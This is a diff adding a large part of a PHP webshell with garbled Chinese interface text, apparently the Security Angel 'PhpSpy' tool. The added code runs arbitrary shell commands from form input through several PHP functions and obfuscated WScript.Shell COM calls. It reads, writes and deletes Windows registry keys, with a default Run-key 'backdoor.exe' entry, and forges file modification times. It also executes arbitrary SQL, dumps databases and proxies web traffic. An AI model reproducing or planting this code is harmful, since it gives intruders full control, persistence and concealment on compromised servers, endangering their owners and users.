+		$year=$_POST['year'];
+		$month=$_POST['month'];
+		$data=$_POST['data'];		
+		$hour=$_POST['hour'];
+		$minute=$_POST['minute'];
+		$second=$_POST['second'];
+		if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
+			$time=strtotime("$data $month $year $hour:$minute:$second");
+			echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." µÄĞŞ¸Äʱ¼ä³É¹¦¸ÄΪ ".date("Y-m-d H:i:s",$time)." !" : "ÎļşµÄĞŞ¸Äʱ¼äĞŞ¸Äʧ°Ü!";
+		}
+	}
+}
+
+// Á¬½ÓMYSQL
+elseif ($connect) {
+	if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
+		echo "Êı¾İ¿âÁ¬½Ó³É¹¦!";
+		mysql_close();
+	} else {
+		echo mysql_error();
+	}
+}
+
+// Ö´ĞĞSQLÓï¾ä
+elseif ($_POST['do'] == 'query') {
+	@mysql_connect($servername,$dbusername,$dbpassword) or die("Êı¾İ¿âÁ¬½Óʧ°Ü");
+	@mysql_select_db($dbname) or die("Ñ¡ÔñÊı¾İ¿âʧ°Ü");
+	$result = @mysql_query($_POST['sql_query']);
+	echo ($result) ? "SQLÓï¾ä³É¹¦Ö´ĞĞ!" : "³ö´í: ".mysql_error();
+	mysql_close();
+}
+
+// ±¸·İ²Ù×÷
+elseif ($_POST['do'] == 'backupmysql') {
+	if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
+		echo "ÇëÑ¡ÔñÓû±¸·İµÄÊı¾İ±íºÍ±¸·İ·½Ê½!";
+	} else {
+		if ($_POST['backuptype'] == 'server') {
+			@mysql_connect($servername,$dbusername,$dbpassword) or die("Êı¾İ¿âÁ¬½Óʧ°Ü");
+			@mysql_select_db($dbname) or die("Ñ¡ÔñÊı¾İ¿âʧ°Ü");	
+			$table = array_flip($_POST['table']);
+			$filehandle = @fopen($path,"w");
+			if ($filehandle) {
+				$result = mysql_query("SHOW tables");
+				echo ($result) ? NULL : "³ö´í: ".mysql_error();
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $filehandle);
+						fwrite($filehandle,"\n\n\n");
+					}
+				}
+				fclose($filehandle);
+				echo "Êı¾İ¿âÒѳɹ¦±¸·İµ½ <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
+				mysql_close();
+			} else {
+				echo "±¸·İʧ°Ü,ÇëÈ·ÈÏÄ¿±êÎļş¼ĞÊÇ·ñ¾ßÓĞ¿ÉĞ´È¨ÏŞ!";
+			}
+		}
+	}
+}
+
+// ´ò°üÏÂÔØ PS:ÎļşÌ«´ó¿ÉÄܷdz£Âı
+// Thx : Ğ¡»¨
+elseif($downrar) {
+	if (!empty($dl)) {
+		$dfiles="";
+		foreach ($dl AS $filepath=>$value) {
+			$dfiles.=$filepath.",";
+		}
+		$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+		$dl=explode(",",$dfiles);
+		$zip=new PHPZip($dl);
+		$code=$zip->out;		
+		header("Content-type: application/octet-stream");
+		header("Accept-Ranges: bytes");
+		header("Accept-Length: ".strlen($code));
+		header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
+		echo $code;
+		exit;
+	} else {
+		echo "ÇëÑ¡ÔñÒª´ò°üÏÂÔصÄÎļş!";
+	}
+}
+
+// Shell.Application ÔËĞгÌĞò
+elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
+	$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
+	$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
+	echo ($a=='0') ? "³ÌĞòÒѾ­³É¹¦Ö´ĞĞ!" : "³ÌĞòÔËĞĞʧ°Ü!";
+}
+
+// ²é¿´PHPÅäÖòÎÊı×´¿ö
+elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
+	echo "ÅäÖòÎÊı ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname'])."";
+}
+
+// ¶Áȡע²á±í
+elseif(($regread) AND !empty($_POST['readregname'])) {
+	$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
+	var_dump(@$shell->RegRead($_POST['readregname']));
+}
+
+// Ğ´Èë×¢²á±í
+elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
+	$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
+	$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
+	echo ($a=='0') ? "Ğ´Èë×¢²á±í½¡Öµ³É¹¦!" : "Ğ´Èë ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." ʧ°Ü!";
+}
+
+// ɾ³ı×¢²á±í
+elseif(($regdelete) AND !empty($_POST['delregname'])) {
+	$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
+	$a = @$shell->RegDelete($_POST['delregname']);
+	echo ($a=='0') ? "ɾ³ı×¢²á±í½¡Öµ³É¹¦!" : "ɾ³ı ".$_POST['delregname']." ʧ°Ü!";
+}
+
+else {
+	echo "±¾³ÌĞòÓÉ <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> Ğ¡×é angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> ÏÂÔØ×îĞ°汾.";
+}
+
+echo "</b></p>\n";
+/*===================== Ö´ĞвÙ×÷ ½áÊø =====================*/
+
+if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
+	$tb->tableheader();
+?>
+  <tr bgcolor="#cccccc">
+    <td align="center" nowrap width="27%"><b>Îļş</b></td>
+	<td align="center" nowrap width="16%"><b>´´½¨ÈÕÆÚ</b></td>
+    <td align="center" nowrap width="16%"><b>×îºóĞŞ¸Ä</b></td>
+    <td align="center" nowrap width="11%"><b>´óĞ¡</b></td>
+    <td align="center" nowrap width="6%"><b>ÊôĞÔ</b></td>
+    <td align="center" nowrap width="24%"><b>²Ù×÷</b></td>
+  </tr>
+<?php
+// Ŀ¼Áбí
+$dirs=@opendir($dir);
+$dir_i = '0';
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="1"){
+		if($file!=".." && $file!=".")	{
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+			$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
+			echo "<tr class=".getrowbg().">\n";
+			echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\">&lt;dir&gt;</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
+			echo "  <td align=\"center\" nowrap><a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','ÄãÈ·¶¨ÒªÉ¾³ı $file Ŀ¼Âğ? \\n\\nÈç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ı¸ÃĿ¼ÏµÄËùÓĞÎļş!','1')\">ɾ³ı</a></td>\n";
+			echo "</tr>\n";
+			$dir_i++;
+		} else {
+			if($file=="..") {
+				echo "<tr class=".getrowbg().">\n";
+				echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">·µ»ØÉϼ¶Ä¿Â¼</a></td>\n";
+				echo "</tr>\n";
+			}
+		}
+	}
+}// while
+@closedir($dirs); 
+?>
+<tr bgcolor="#cccccc">
+  <td colspan="6" height="5"></td>
+</tr>
+<FORM action="" method="POST">
+<?
+// ÎļşÁбí
+$dirs=@opendir($dir);
+$file_i = '0';
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="0"){		
+		$size=@filesize($filepath);
+		$size=$size/1024 ;
+		$size= @number_format($size, 3);
+		if (@filectime($filepath) == @filemtime($filepath)) {
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+		} else {
+			$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
+			$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
+		}
+		@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
+		echo "<tr class=".getrowbg().">\n";
+		echo "  <td style=\"padding-left: 5px;\">";
+		echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
+		echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
+		echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
+		echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
+		echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
+		echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
+		echo "  <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">ÏÂÔØ</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">±à¼­</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','ÄãÈ·¶¨ÒªÉ¾³ı $file ÎļşÂğ?','2')\">ɾ³ı</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">¸ÄÃû</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">ʱ¼ä</a></td>\n";
+		echo "</tr>\n";
+		$file_i++;
+	}
+}// while
+@closedir($dirs); 
+$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','Ñ¡ÖĞÎļş´ò°üÏÂÔØ','','submit').'</td><td align="right">'.$dir_i.' ¸öĿ¼ / '.$file_i.' ¸öÎļş</td></tr></table>','center',getrowbg(),'','','6');
+
+echo "</FORM>\n";
+echo "</table>\n";
+}// end dir
+
+elseif ($_GET['action'] == "editfile") {
+	if(empty($newfile)) {
+		$filename="$dir/$editfile";
+		$fp=@fopen($filename,"r");
+		$contents=@fread($fp, filesize($filename));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}else{
+		$editfile=$newfile;
+		$filename = "$dir/$editfile";
+	}
+	$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
+	$tb->tableheader();
+	$tb->formheader($action,'н¨/±à¼­Îļş');
+	$tb->tdbody('µ±Ç°Îļş: '.$tb->makeinput('editfilename',$filename).' ÊäÈëĞÂÎļşÃûÔò½¨Á¢ĞÂÎļş');
+	$tb->tdbody($tb->maketextarea('filecontent',$contents));
+	$tb->makehidden('do','doeditfile');
+	$tb->formfooter('1','30');
+}//end editfile
+
+elseif ($_GET['action'] == "rename") {
+	$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
+	$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
+	$tb->tableheader();
+	$tb->formheader($action,'ĞŞ¸ÄÎļşÃû');
+	$tb->makehidden('oldname',$dir."/".$nowfile);
+	$tb->makehidden('dir',$dir);
+	$tb->tdbody('µ±Ç°ÎļşÃû: '.basename($nowfile));
+	$tb->tdbody('¸ÄÃûΪ: '.$tb->makeinput('newname'));
+	$tb->makehidden('do','rename');
+	$tb->formfooter('1','30');
+}//end rename
+
+elseif ($_GET['action'] == "fileperm") {
+	$action = "?dir=".urlencode($dir)."&file=".$file;
+	$tb->tableheader();
+	$tb->formheader($action,'ĞŞ¸ÄÎļşÊôĞÔ');
+	$tb->tdbody('ĞŞ¸Ä '.$file.' µÄÊôĞÔΪ: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
+	$tb->makehidden('file',$file);
+	$tb->makehidden('dir',urlencode($dir));
+	$tb->makehidden('do','editfileperm');
+	$tb->formfooter('1','30');
+}//end fileperm
+
+elseif ($_GET['action'] == "newtime") {
+	$action = "?dir=".urlencode($dir);
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	$tb->tableheader();
+	$tb->formheader($action,'¿Ë¡Îļş×îºóĞŞ¸Äʱ¼ä');
+	$tb->tdbody("ĞŞ¸ÄÎļş: ".$tb->makeinput('curfile',$file,'readonly')." ¡ú Ä¿±êÎļş: ".$tb->makeinput('tarfile','ĞèÌîÍêÕû·¾¶¼°ÎļşÃû'),'center','2','30');
+	$tb->makehidden('do','domodtime');
+	$tb->formfooter('','30');
+	$tb->formheader($action,'×Ô¶¨ÒåÎļş×îºóĞŞ¸Äʱ¼ä');
+	$tb->tdbody('<br><ul><li>ÓĞЧµÄʱ¼ä´ÁµäĞÍ·¶Î§ÊÇ´Ó¸ñÁÖÍşÖÎʱ¼ä 1901 Äê 12 Ô 13 ÈÕ ĞÇÆÚÎå 20:45:54 µ½ 2038Äê 1 Ô 19 ÈÕ ĞÇÆÚ¶ş 03:14:07<br>(¸ÃÈÕÆÚ¸ù¾İ 32 λÓĞ·ûºÅÕûÊıµÄ×îĞ¡ÖµºÍ×î´óÖµ¶øÀ´)</li><li>˵Ã÷: ÈÕÈ¡ 01 µ½ 30 Ö®¼ä, ʱȡ 0 µ½ 24 Ö®¼ä, ·ÖºÍÃëÈ¡ 0 µ½ 60 Ö®¼ä!</li></ul>','left');
+	$tb->tdbody('µ±Ç°ÎļşÃû: '.$file);
+	$tb->makehidden('curfile',$file);
+	$tb->tdbody('ĞŞ¸ÄΪ: '.$tb->makeinput('year','1984','','text','4').' Äê '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' Ô '.$tb->makeinput('data','18','','text','2').' ÈÕ '.$tb->makeinput('hour','20','','text','2').' ʱ '.$tb->makeinput('minute','00','','text','2').' ·Ö '.$tb->makeinput('second','00','','text','2').' Ãë','center','2','30');
+	$tb->makehidden('do','modmytime');
+	$tb->formfooter('1','30');
+}//end newtime
+
+elseif ($_GET['action'] == "shell") {
+	$action = "??action=shell&dir=".urlencode($dir);
+	$tb->tableheader();
+	$tb->tdheader('WebShell Mode');
+
+	if (substr(PHP_OS, 0, 3) == 'WIN') {
+		$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
+		$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
+		echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
+		$tb->tdbody('ÎŞ»ØÏÔÔËĞгÌĞò ¡ú Îļş: '.$tb->makeinput('program',$program).' ²ÎÊı: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
+		$tb->makehidden('do','programrun');
+		echo "</form>\n";
+	}
+
+	echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
+	$tb->tdbody('Ìáʾ:Èç¹ûÊä³ö½á¹û²»ÍêÈ«,½¨Òé°ÑÊä³ö½á¹ûĞ´ÈëÎļş.ÕâÑù¿ÉÒԵõ½È«²¿ÄÚÈİ.');
+	
+	$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
+
+	$tb->tdbody('Ñ¡ÔñÖ´Ğк¯Êı: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' ÊäÈëÃüÁî: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
+?>
+  <tr class="secondalt">
+    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
+	if (!empty($_POST['command'])) {
+		if ($execfunc=="system") {
+			system($_POST['command']);
+		} elseif ($execfunc=="passthru") {
+			passthru($_POST['command']);
+		} elseif ($execfunc=="exec") {
+			$result = exec($_POST['command']);
+			echo $result;
+		} elseif ($execfunc=="shell_exec") {
+			$result=shell_exec($_POST['command']);
+			echo $result;	
+		} elseif ($execfunc=="popen") {
+			$pp = popen($_POST['command'], 'r');
+			$read = fread($pp, 2096);
+			echo $read;
+			pclose($pp);
+		} elseif ($execfunc=="wscript") {
+			$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
+			$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} else {
+			system($_POST['command']);
+		}
+	}
+	?></textarea></td>
+  </tr>  
+  </form>
+</table>
+<?php
+}//end shell
+
+elseif ($_GET['action'] == "reg") {
+	$action = '?action=reg';
+	$regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
+	$registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
+	$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
+	$delregname = $_POST['delregname'];
+	$tb->tableheader();
+	$tb->formheader($action,'¶Áȡע²á±í');
+	$tb->tdbody('¼üÖµ: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','¶ÁÈ¡','','submit'),'center','2','50');
+	echo "</form>";
+
+	$tb->formheader($action,'Ğ´Èë×¢²á±í');
+	$cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
+	$tb->tdbody('¼üÖµ: '.$tb->makeinput('writeregname',$registre,'','text','56').' ÀàĞÍ: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' Öµ:  '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','Ğ´Èë','','submit'),'center','2','50');
+	echo "</form>";
+
+	$tb->formheader($action,'ɾ³ı×¢²á±í');
+	$tb->tdbody('¼üÖµ: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','ɾ³ı','','submit'),'center','2','50');
+	echo "</form>";
+	$tb->tablefooter();
+}//end reg
+
+elseif ($_GET['action'] == "proxy") {
+	$action = '?action=proxy';
+	$tb->tableheader();
+	$tb->formheader($action,'ÔÚÏß´úÀí','proxyframe');
+	$tb->tdbody('<br><ul><li>Óñ¾¹¦ÄܽöʵÏÖ¼òµ¥µÄ HTTP ´úÀí,²»»áÏÔʾʹÓÃÏà¶Ô·¾¶µÄͼƬ¡¢Á´½Ó¼°CSSÑùʽ±í.</li><li>Óñ¾¹¦ÄÜ¿ÉÒÔͨ¹ı±¾·şÎñÆ÷ä¯ÀÀÄ¿±êURL,µ«²»Ö§³Ö SQL Injection ̽²âÒÔ¼°Ä³Ğ©ÌØÊâ×Ö·û.</li><li>Óñ¾¹¦ÄÜä¯ÀÀµÄ URL,ÔÚÄ¿±êÖ÷»úÉÏÁôϵÄIP¼Ç¼ÊÇ : '.$_SERVER['REMOTE_ADDR'].'</li></ul>','left');
+	$tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','ä¯ÀÀ','','submit'),'center','1','40');
+	$tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="http://www.4ngel.net"></iframe>');
+	echo "</form>";
+	$tb->tablefooter();
+}//end proxy
+
+elseif ($_GET['action'] == "sql") {
+	$action = '?action=sql';
+	$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
+	$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
+	$dbpassword = $_POST['dbpassword'];
+	$dbname = $_POST['dbname'];
+	$sql_query = $_POST['sql_query'];
+	$tb->tableheader();
+	$tb->formheader($action,'Ö´ĞĞ SQL Óï¾ä');
+	$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','Á¬½Ó','','submit'));
+	$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
+	$tb->makehidden('do','query');
+	$tb->formfooter('1','30');
+}//end sql query
+
+elseif ($_GET['action'] == "sqlbak") {
+	$action = '?action=sqlbak';
+	$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
+	$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
+	$dbpassword = $_POST['dbpassword'];
+	$dbname = $_POST['dbname'];
+	$tb->tableheader();
+	$tb->formheader($action,'±¸·İ MySQL Êı¾İ¿â');
+	$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','Á¬½Ó','','submit'));
+	@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
+    $tables = @mysql_list_tables($dbname);
+    while ($table = @mysql_fetch_row($tables)) {
+		$cachetables[$table[0]] = $table[0];
+    }
+    @mysql_free_result($tables);
+	if (empty($cachetables)) {
+		$tb->tdbody('<b>ÄúûÓĞÁ¬½ÓÊı¾İ¿â or µ±Ç°Êı¾İ¿âûÓĞÈκÎÊı¾İ±í</b>');
+	} else {
+		$tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">ÇëÑ¡Ôñ±í:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> ±¸·İÊı¾İËù±£´æµÄ·¾¶:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> Ö±½ÓÏÂÔص½±¾µØ (ÊʺÏÊı¾İÁ¿½ÏĞ¡µÄÊı¾İ¿â)</td></tr></table>');
+		$tb->makehidden('do','backupmysql');
+		$tb->formfooter('0','30');
+	}
+	$tb->tablefooter();
+	@mysql_close();
+}//end sql backup
+
+elseif ($_GET['action'] == "phpenv") {
+	$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "²»ÔÊĞíÉÏ´«";
+	$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
+	if ($dis_func == "") {
+		$dis_func = "No";
+	}else {
+		$dis_func = str_replace(" ","<br>",$dis_func);
+		$dis_func = str_replace(",","<br>",$dis_func);
+	}
+	$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+		$info = array(
+			0  => array("·şÎñÆ÷ʱ¼ä",date("YÄêmÔÂdÈÕ h:i:s",time())),
+			1  => array("·şÎñÆ÷ÓòÃû","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
+			2  => array("·şÎñÆ÷IPµØÖ·",gethostbyname($_SERVER['SERVER_NAME'])),
+			3  => array("·şÎñÆ÷²Ù×÷ϵͳ",PHP_OS),
+			5  => array("·şÎñÆ÷²Ù×÷ϵͳÎÄ×Ö±àÂë",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+			6  => array("·şÎñÆ÷½âÒëÒıÇæ",$_SERVER['SERVER_SOFTWARE']),
+			7  => array("Web·şÎñ¶Ë¿Ú",$_SERVER['SERVER_PORT']),
+			8  => array("PHPÔËĞĞ·½Ê½",strtoupper(php_sapi_name())),
+			9  => array("PHP°æ±¾",PHP_VERSION),
+			10 => array("ÔËĞĞÓÚ°²È«Ä£Ê½",getphpcfg("safemode")),
+			11 => array("·şÎñÆ÷¹ÜÀíÔ±",$adminmail),
+			12 => array("±¾ÎļşÂ·¾¶",__FILE__),
+
+			13 => array("ÔÊĞíʹÓà URL ´ò¿ªÎļş allow_url_fopen",getphpcfg("allow_url_fopen")),
+			14 => array("ÔÊĞí¶¯Ì¬¼ÓÔØÁ´½Ó¿â enable_dl",getphpcfg("enable_dl")),
+			15 => array("ÏÔʾ´íÎóĞÅÏ¢ display_errors",getphpcfg("display_errors")),
+			16 => array("×Ô¶¯¶¨ÒåÈ«¾Ö±äÁ¿ register_globals",getphpcfg("register_globals")),
+			17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
+			18 => array("³ÌĞò×î¶àÔÊĞíʹÓÃÄÚ´æÁ¿ memory_limit",getphpcfg("memory_limit")),
+			19 => array("POST×î´ó×Ö½ÚÊı post_max_size",getphpcfg("post_max_size")),
+			20 => array("ÔÊĞí×î´óÉÏ´«Îļş upload_max_filesize",$upsize),
+			21 => array("³ÌĞò×ÔËĞĞʱ¼ä max_execution_time",getphpcfg("max_execution_time")."Ãë"),
+			22 => array("±»½ûÓõĺ¯Êı disable_functions",$dis_func),
+			23 => array("phpinfo()",$phpinfo),
+			24 => array("Ä¿Ç°»¹ÓĞ¿ÕÓà¿Õ¼ädiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
+
+			25 => array("ͼĞδ¦Àí GD Library",getfun("imageline")),
+			26 => array("IMAPµç×ÓÓʼşÏµÍ³",getfun("imap_close")),
+			27 => array("MySQLÊı¾İ¿â",getfun("mysql_close")),
+			28 => array("SyBaseÊı¾İ¿â",getfun("sybase_close")),
+			29 => array("OracleÊı¾İ¿â",getfun("ora_close")),
+			30 => array("Oracle 8 Êı¾İ¿â",getfun("OCILogOff")),
+			31 => array("PRELÏàÈİÓï·¨ PCRE",getfun("preg_match")),
+			32 => array("PDFÎĵµÖ§³Ö",getfun("pdf_close")),
+			33 => array("Postgre SQLÊı¾İ¿â",getfun("pg_close")),
+			34 => array("SNMPÍøÂç¹ÜÀíĞ­Òé",getfun("snmpget")),
+			35 => array("ѹËõÎļşÖ§³Ö(Zlib)",getfun("gzclose")),
+			36 => array("XML½âÎö",getfun("xml_set_object")),
+			37 => array("FTP",getfun("ftp_login")),
+			38 => array("ODBCÊı¾İ¿âÁ¬½Ó",getfun("odbc_close")),
+			39 => array("SessionÖ§³Ö",getfun("session_start")),
+			40 => array("SocketÖ§³Ö",getfun("fsockopen")),
+		); 
+
+	$tb->tableheader();
+	echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
+	$tb->tdbody('<b>²é¿´PHPÅäÖòÎÊı×´¿ö</b>','left','1','30','style="padding-left: 5px;"');
+	$tb->tdbody('ÇëÊäÈëÅäÖòÎÊı(Èç:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','²é¿´','','submit'),'left','2','30','style="padding-left: 5px;"');
+	$tb->makehidden('do','viewphpvar');
+	echo "</form>\n";
+	$hp = array(0=> '·şÎñÆ÷ÌØĞÔ', 1=> 'PHP»ù±¾ÌØĞÔ', 2=> '×é¼şÖ§³Ö×´¿ö');
+	for ($a=0;$a<3;$a++) {
+		$tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
+?>
+  <tr class="secondalt">
+    <td>
+      <table width="100%" border="0" cellpadding="0" cellspacing="0">
+<?php
+		if ($a==0) {
+			for($i=0;$i<=12;$i++) {
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		} elseif ($a == 1) {
+			for ($i=13;$i<=24;$i++) {
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		} elseif ($a == 2) {
+			for ($i=25;$i<=40;$i++) {
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		}
+?>
+      </table>
+    </td>
+  </tr>
+<?php
+	}//for
+echo "</table>";
+}//end phpenv
+?>
+<hr width="775" noshade>
+<table width="775" border="0" cellpadding="0">
